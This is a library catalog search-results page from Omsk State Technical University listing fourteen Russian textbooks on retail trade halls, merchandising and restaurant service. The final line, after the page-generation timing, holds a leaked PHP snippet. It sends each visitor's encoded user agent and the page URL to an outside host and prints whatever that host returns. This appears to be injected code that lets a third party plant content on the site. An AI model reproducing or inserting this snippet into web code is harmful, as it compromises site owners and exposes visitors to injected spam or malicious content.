Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

135 пользователей


Зарегистрированных: 1 

Борисенко Елена Стефановна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЗАЛ ТОРГОВЫЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
Коник Н. В. Организация и проектирование предприятий торговли [Текст] : учеб. пособие / Н. В. Коник, 2009. - 301 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
2. 
Парамонова Т. Н. Мерчандайзинг [Текст] : Учеб. пособие для студ. высш. учеб. заведений / Т. Н. Парамонова, И. А. Рамазанов, 2009. - 143 с.
Держатели документа (Информация об экземплярах) 
3. 
Бураковская Н. В. Сервисное обслуживание на предприятиях индустрии питания [Текст] : учебное пособие / Н. В. Бураковская, О. В. Пасько, 2012. - 167 с.
Держатели документа (Информация об экземплярах) 
4. 
Бураковская Н. В. Сервисное обслуживание на предприятиях индустрии питания [Электронный ресурс] / Н. В. Бураковская, О. В. Пасько, 2012 o=эл. опт. диск
Держатели документа (Информация об экземплярах) 
5. 
Чкалова О. В. Торговое дело. Организация, технология и проектирование торговых предприятий [Текст] / О. В. Чкалова, 2015. - 383 с.
Держатели документа (Информация об экземплярах) 
6. 
Жулидов С. И. Организация торговли [Текст] / С. И. Жулидов, 2015. - 351 с.
Ключевые слова 
ОРГАНИЗАЦИЯ ТОРГОВЛИ -- ПРЕДПРИЯТИЕ ТОРГОВОЕ -- ПРЕДПРИНИМАТЕЛЬ ИНДИВИДУАЛЬНЫЙ -- ОРГАНИЗАЦИЯ ОПТОВОЙ ТОРГОВЛИ -- ТОРГОВЛЯ ОПТОВАЯ -- УСЛУГИ ОПТОВОЙ ТОРГОВЛИ -- ПОСТАВКА ТОВАРОВ -- ОРГАНИЗАЦИЯ РОЗНИЧНОЙ ТОРГОВЛИ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- УСЛУГИ РОЗНИЧНОЙ ТОРГОВЛИ -- МАГАЗИН - ПРОЕКТИРОВАНИЕ -- ПЛАНИРОВКА ТОРГОВОГО ЗАЛА -- ЗАЛ ТОРГОВЫЙ -- ДИЗАЙН МАГАЗИНА -- ОСНАЩЕНИЕ МАГАЗИНА ОБЩЕТЕХНИЧЕСКОЕ -- ПРАВИЛА САНИТАРНЫЕ - ТОРГОВЛЯ -- НОРМЫ СТРОИТЕЛЬНЫЕ -- ТОВАРОДВИЖЕНИЕ -- ПРИЕМКА ТОВАРОВ -- ОФОРМЛЕНИЕ ДОКУМЕНТОВ -- ХРАНЕНИЕ ТОВАРА -- ВЫКЛАДКА ТОВАРА -- ОБСЛУЖИВАНИЕ ПОКУПАТЕЛЯ -- ТЕХНОЛОГИЯ ПРОДАЖИ -- ПРАВИЛА ТОРГОВЛИ -- СКЛАД ТОВАРНЫЙ -- ЗДАНИЕ СКЛАДСКОЕ -- ПЛАНИРОВКА СКЛАДА -- ОПЕРАЦИЯ ТОВАРНАЯ -- ТЕХНОЛОГИЯ СКЛАДСКИХ ОПЕРАЦИЙ
Держатели документа (Информация об экземплярах) 
7. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
8. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
9. 
Рубцова Л. И. Справочник продавца продовольственных товаров [Текст] : справочное издание / Л. И. Рубцова, В. А. Тимофеева, М. В. Дашкевич, 2002. - 406, [9] с.
Ключевые слова 
СЕТЬ ТОРГОВАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- Магазин -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬНОЕ -- МЕБЕЛЬ ТОРГОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАНСПОРТНОЕ -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ККМ -- машина контрольно-кассовая -- ИНВЕНТАРЬ ТОРГОВЫЙ -- ПРОДАЖА РОЗНИЧНАЯ -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ПРАВИЛА РОЗНИЧНОЙ ТОРГОВЛИ -- ПРАВИЛА САНИТАРНЫЕ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- ТАРА -- ОРГАНИЗАЦИЯ ТРУДА - торговля -- УЧЕТ ХОЗЯЙСТВЕННЫЙ -- УЧЕТ КАССОВЫХ ОПЕРАЦИЙ -- УЧЕТ ПОСТУПЛЕНИЯ ТОВАРА -- Списание товара -- Ученка товара -- Товары кондитерские - продажа -- ТЕХНОЛОГИЯ продажи
Держатели документа (Информация об экземплярах) 
10. 
Памбухчиянц О. В. Организация и технология коммерческой деятельности в вопросах и ответах [Текст] : Учеб. пособие для студ. сред. спец. учеб. заведений / О. В. Памбухчиянц, 2001. - 318 с.
Ключевые слова 
ТОВАРОДВИЖЕНИЕ -- ПРЕДПРИЯТИЕ ОПТОВОЕ ТОРГОВОЕ -- ПРЕДПРИЯТИЕ РОЗНИЧНОЕ ТОРГОВОЕ -- ИНФОРМАЦИЯ КОММЕРЧЕСКАЯ -- ТАЙНА КОММЕРЧЕСКАЯ -- ДОГОВОР В ТОРГОВЛЕ -- ЗАКУПКА ТОВАРОВ -- ДОГОВОР ПОСТАВКИ -- ЯРМАРКА ОПТОВАЯ -- ПРОДАЖА ОПТОВАЯ -- БИРЖА ТОВАРНАЯ -- АУКЦИОН -- РЫНОК ОПТОВЫЙ -- кэш энд кэрри -- ТОРГОВЛЯ РОЗНИЧНАЯ -- АССОРТИМЕНТ ТОВАРНЫЙ -- УПРАВЛЕНИЕ ТОВАРНЫМИ ЗАПАСАМ -- СТИМУЛИРОВАНИЕ СБЫТА -- РЕКЛАМА торговая -- СТИЛЬ ФИРМЕННЫЙ МАГАЗИНА -- ИНТЕРЬЕР МАГАЗИНА -- ТАРА -- УПАКОВКА ТОВАРА -- ПЕРЕВОЗКА ТОВАРА -- СКЛАД ТОВАРНЫЙ -- ТОРГОВЛЯ ОПТОВАЯ -- ПРИЕМКА ТОВАРОВ -- МАГАЗИН -- ЗАЛ ТОРГОВЫЙ -- ВЫКЛАДКА ТОВАРА -- ХРАНЕНИЕ ТОВАРА -- ЗАЩИТА ПРАВ ПОТРЕБИТЕЛЕЙ -- ПРАВИЛА ПРОДАЖИ ТОВАРА -- ПРАВИЛА РОЗНИЧНОЙ ТОРГОВЛИ -- ПРАВИЛА САНИТАРНЫЕ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- ТОРГОВЛЯ - КОНТРОЛЬ ГОСУДАРС -- ПРОЕКТИРОВАНИЕ ПРЕДПРИЯТИЙ ТОРГОВЛИ -- СТРОИТЕЛЬСТВО ПРЕДПРИЯТИЙ ТОРГОВЫХ -- РЕМОНТ ТОРГОВЫХ ПРЕДПРИЯТИЙ -- Торговля - Словарь терминов
Держатели документа (Информация об экземплярах) 
11. 
Официант-бармен от А до Я [Текст] : справочное издание, 2002. - 223 с.
Ключевые слова 
РЕСТОРАН -- Кафе -- БАР -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- Раздаточная -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- БУФЕТ -- Касса -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ- прием -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БУФЕТ-бар -- ОБСЛУЖИВАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕСТОРАН - реклама -- общепит - охрана труда -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
12. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
13. 
Парамонова Т. Н. Мерчандайзинг [Текст] : Учеб. пособие для студ. высш. учеб. заведений / Т. Н. Парамонова, И. А. Рамазанов, 2004. - 143 с.
Держатели документа (Информация об экземплярах) 
14. 
Памбухчиянц, Ольга Валерьевна. Организация и технология коммерческой деятельности [Текст] : Учеб. для сред. спец. учеб. заведений / В. К. Памбухчиянц, 1999. - 288, [1] с.
Ключевые слова 

В учебнике освещаются основные этапы коммерческой деятельности в торговле, а также вопросы организации и технологии торговых процессов на предприятиях <оптовой> и <розничной> торговли. Материал приводится в последовательности, соответствующей реальному движению <товаров> из сферы материального производства в сферу <потребления>.

С учетом современного опыта освещаются актуальные вопросы организации <тарного> хозяйства в торговле и <перевозки> товаров различными видами транспорта.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3183 - 26.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.65 с.12 запросов, 0.30c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;